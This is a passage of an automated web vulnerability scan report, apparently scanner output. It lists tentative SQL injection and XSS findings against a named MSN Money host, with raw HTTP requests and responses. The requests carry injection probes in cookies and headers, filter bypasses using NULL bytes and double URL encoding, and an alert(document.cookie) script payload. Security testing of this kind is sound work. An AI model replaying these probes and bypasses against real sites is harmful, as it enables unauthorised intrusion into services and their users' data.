Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610'; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

Request 2

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610''; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.51. http://redacted/investor/charts/chartdl.aspx [expid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

Request 1

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:14 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2''; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:09:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.52. http://redacted/investor/charts/chartdl.aspx [v1st cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

Request 1

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:17 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.53. http://redacted/investor/home.aspx [CC cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:44 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:02:45 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.54. http://redacted/investor/home.aspx [CULTURE cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

Remediation detail

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:02:18 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.55. http://redacted/investor/home.aspx [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:03:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:03:27 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.56. http://redacted/investor/market/exchangerates.aspx [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/exchangerates.aspx

Issue detail

Remediation detail

Request 1

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1427c"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:30 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.57. http://redacted/investor/market/exchangerates.aspx [Sample cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/exchangerates.aspx

Issue detail

Remediation detail

Request 1

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.58. http://redacted/investor/market/treasuries.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/treasuries.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor%2527/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

Request 2

GET /investor%2527%2527/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:48 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.59. http://redacted/investor/market/treasuries.aspx [s_cc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/treasuries.aspx

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<script type="text/javascript">
if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr;
</script>
...[SNIP]...

Request 2

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:33 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.60. http://redacted/investor/market/usindex.aspx [CC cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/usindex.aspx

Issue detail

Request 1

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:32 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.61. http://redacted/investor/market/usindex.aspx [MC1 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/usindex.aspx

Issue detail

Remediation detail

Request 1

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:09 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:11 GMT
Server: Microsoft-IIS/6.0
